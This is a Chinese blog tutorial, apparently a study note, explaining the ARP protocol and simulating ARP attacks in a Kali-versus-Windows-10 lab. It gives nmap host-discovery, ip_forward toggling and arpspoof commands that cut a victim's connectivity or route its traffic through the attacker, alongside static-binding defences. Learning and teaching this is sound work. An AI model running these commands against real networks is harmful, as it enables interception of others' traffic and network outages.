网络协议-ARP协议与攻击模拟

已于 2022-10-23 15:13:24 修改
阅读量1k 收藏 5
点赞数 1
分类专栏: 网络协议 文章标签: 网络协议 网络 linux web安全
于 2022-10-18 20:10:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/127395583
版权

ARP协议

1、各层协议

  • 网路层:IP、ARP、ICMP、IGMP、RARP 隧道协议(IPSec协议簇、GRE)、路由协议(RIP、OSPF、IS-IS)
  • 传输层:TCP、UDP
  • 应用层:SMB、telnet、ssh、http、dhcp、dns、https、pop、imap、smtp、ntp等等

2、ARP协议

  • 将一个已知IP地址解析为MAC地址
  • 在同一局域网中,需要通过MAC地址进行定位,不同网络通信,主句需要将数据交给网关进行转发,所以主机需要定位自己的网关
  • 原理
    • 主机发送ARP广播请求,目标主机收到后进行ARP单播响应

3、ARP缓存

  • 当主机在网络中进行通信,就会去获取对应MAC地址,从而记录到自身的ARP缓存表中,Windows操作系统中使用arp -a来进行查看,当不进行通信时,arp缓存会自动消失,Windows操作系统的arp缓存保存时间为120s
  • 在Linux系统中一般使用arp-n查看缓存表

4、ARP的攻击和欺骗

  • ARP攻击

    • 攻击主机发送虚假的arp响应报文,从而被攻击主机访问其他网络时会将数据发送到虚假的MAC地址上,造成断网

  • ARP欺骗

    • 攻击主机发送真实的arp响应报文,携带的是自身的真实mac地址,从而被攻击主机访问其他网络时会将数据发送到攻击主机,攻击主机需要开启ip转发,最终携带被攻击访问网站的流量数据

  • 防御

    • 使用arp静态绑定方式,在路由器和主机上同时绑定
    • 设备上的免费arp来持续向主机发送arp应答报文

ARP攻击(断网)

1、环境配置

操作系统IP地址MAC地址
kali Linux192.168.126.13100-0C-29-CB-22-0C
Windows 10 专业版192.168.126.13800-0C-29-7C-F0-4F

2、攻击步骤

  • 查看arp缓存表

    win10运行arp -a

    在这里插入图片描述

  • 主机扫描

    # 使用namp扫描网段内存活的主机
nmap -sP 192.168.126.*

    在这里插入图片描述

    192.168.126.138确定存活

  • 开始攻击

    • kali中运行

      # 查看转发功能是否打开(0:关闭,1:打开)
cat /proc/sys/net/ipv4/ip_forward

# 关闭IP转发功能
echo 0 > /proc/sys/net/ipv4/ip_forward

# 使用arpspoof工具
# arpspoof -i 网卡 -t 目标IP 网关
arpspoof -i eth0 -t 192.168.126.138 192.168.126.2

      在这里插入图片描述

    • 在win10中查看arp缓存表

      arp -a

      在这里插入图片描述

      可以看见此时与网关192.168.126.2绑定的mac地址已经变成了kali的mac地址了

    • 此时在用win10联网测试

      ping www.baidu.com

      在这里插入图片描述

      此时win10已经无法联网了

ARP欺骗(不断网)

  • 前面步骤与APR攻击相同

  • 攻击步骤

    • 在kali运行

      # 查看转发功能是否打开(0:关闭,1:打开)
cat /proc/sys/net/ipv4/ip_forward

# 开启IP转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof -i 网卡 -t 网关 目标IP
arpspoof -i eth0 -t 192.168.126.2 192.168.126.138

      在这里插入图片描述

    • 此时在用win10联网测试

      ping www.baidu.com
能发现win10可以进行联网
贫僧法号云空丶
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络协议攻击模拟:wireshark使用、ARP协议
m0_51456787的博客
07-22 804
协议TCP/IP协议簇。
ARP协议深入解析实例-伪造ARP
01-24
然而,由于ARP协议的设计特性,它也存在一些安全隐患,其中最著名的就是“伪造ARP攻击。 ### ARP协议基础 ARP协议是TCP/IP协议栈的一部分,位于网络层和数据链路层之间。当主机需要向其他主机发送数据时,如果不...
网络协议攻击模拟-03-ARP协议
YueXuan_521的博客
05-02 798
网络协议攻击模拟-03-ARP协议
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【一】
q742971636的博客
06-09 1729
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。
网络协议攻击模拟_02ARP协议
fencecat的博客
01-10 1198
ARP(地址解析协议)一个工作在二层的三层协议,是一个2.5层协议ARP协议地址解析协议
网络协议攻击模拟-04-实施ARP攻击与欺骗
YueXuan_521的博客
05-03 153
网络协议攻击模拟-04-实施ARP攻击与欺骗
2024年网络安全最新网络-ARP协议详解与ARP欺骗(中毒)攻击实战_arp中毒(1)
2401_84240129的博客
05-02 1063
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址(MAC地址)的一个协议。划分到网络层(TCP/IP)或数据链路层(OSI),用在局域网内。功能:完成主机或路由器IP地址到MAC地址的映射。ARP高速缓存(arp表):IP地址和MAC地址的映射。注:网络设备的接口有MAC地址,并不是一个网络设备仅有一个MAC地址,二层交换机这种设备没有MAC地址。
网络协议攻击模拟
YangYubo091699的博客
05-07 3181
协议 TCP/IP协议网络接口层(没有特定的协议) 物理层 (PPPOE-宽带拨号) 数据链路层 网络层:IP(v4/v6)、ARP(地址解析协议)、RARP、ICMP(internet控制报文协议)、IGMP 传输层:TCP(传输控制协议) UDP(用户数据包协议) 应用层:都是基于传输层协议的端口,总共端口0-65536 固定协议的端口号0-1023 DHCP DNS HTTP 80 HTTPS 443 FTP SMTP POP3 IMAP 流量抓取工具(wireshark
网络安全--ARP攻击原理与防护
PC小可的博客
06-16 1万+
目录 一.ARP的原理 二.ARP攻击现象及危害 三.ARP攻击的原理 四.ARP防护 在局域网当中,有一个协议由于它的特性一旦遭受攻击就非常麻烦。首先是它的攻击门槛比较低,找到一些小工具就能实现攻击,而且危害极大。这个协议就是ARP协议ARP攻击是局域网攻击的常用手段,那么我们就从以下几个方向来谈一下ARP协议,了解ARP的危害,并提供一些防护的建议。 一、ARP的原理 arp协议(address resslution protocol)-----地址解析协议 作用是将IP地址解析为以太网MAC
网络协议攻击模拟_01winshark工具简介
fencecat的博客
01-08 1834
winshark是对主机网卡上的数据流量进行抓取,可以对网卡进行混杂模式和非混杂模式的抓包。混杂模式:不管目的是否是自己,都接收。数据镜像:主机A正常与主机B通信,做数据镜像端口,将F0/0接口镜像到F0/2接口,如果主机C开启混杂模式,就能抓取澳主机A发往主机B的链路流量,反之如果主机C是非混杂模式就会将丢弃该数据。非混杂模式:默认情况下,主机的网卡处于此模式,不会接收目的非自己的数据。
网络攻击手段之-----ARP欺骗】
热门推荐
a1379292747的博客
01-13 1万+
本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP的欺骗攻击ARP 欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行 ARP 欺骗攻击。做一个遵纪守法的公民,从我做起!!!ARP (Address Resolution Protocol) 是一种网络协议,用于将 IP 地址转换为物理地址(MAC 地址)。在局域网中,每台设备都有唯一的 MAC 地址,而 IP 地址是可以重复分配的。因此,当一个设备需要发送数据到另一个设备时,它需要知道另一个设备的 MAC 地址。
eth-arp-test
05-14
标题“eth-arp-test”和描述“eth-arp-test”都指向了一个与网络相关的测试,很可能是关于以太网(Ethernet)的地址解析协议ARP)的测试工具或实验。 ARP是TCP/IP协议栈中的一个重要组件,它在局域网(LAN)中用于...
易语言-易语言ARP欺骗攻击
06-29
在"易语言ARP欺骗攻击"这个主题中,我们将深入探讨ARP协议ARP欺骗的基本原理以及如何利用易语言来实现这一攻击ARP(Address Resolution Protocol)是网络层中的一个重要协议,它的主要作用是在IP地址和物理MAC...
网络协议分析》-实训报告2022.docx
03-03
2. 攻击模拟:利用Kali Linux中的工具如`Wireshark`和`Hping3`,模拟了ICMP、UDP和TCP的洪水攻击。这些DoS(Denial of Service)或DDoS(Distributed Denial of Service)攻击是通过发送大量无效请求,耗尽目标系统...
《计算机网络》(学习笔记)
qiqi_liuliu的博客
07-24 2004
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
UDP/TCP协议解析
reyas的博客
07-22 1297
我最近开了几个专栏,诚信互三!====> |||::刷题教程来自网站。|||====> |||::记录我学习C++的经历,看完你一定会有收获。|||====> |||::记录我学习Linux的经历,看完你一定会有收获。|||====> |||::记录我复习C#的经历,,不定期更新。|||====> |||::记录我学习计算机网络,看完你一定会有收获。|||
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 413
计算机网络—三种交换方式图文详解
理解ARP欺骗:从协议到实验
"该资源是一份关于ARP协议ARP欺骗实验的教学资料,旨在介绍网络安全协议的基础知识,特别是ARP协议的工作原理及其在局域网数据传输中的应用。实验内容涉及网络安全协议,包括TCP/IP的分层结构、攻击类型以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值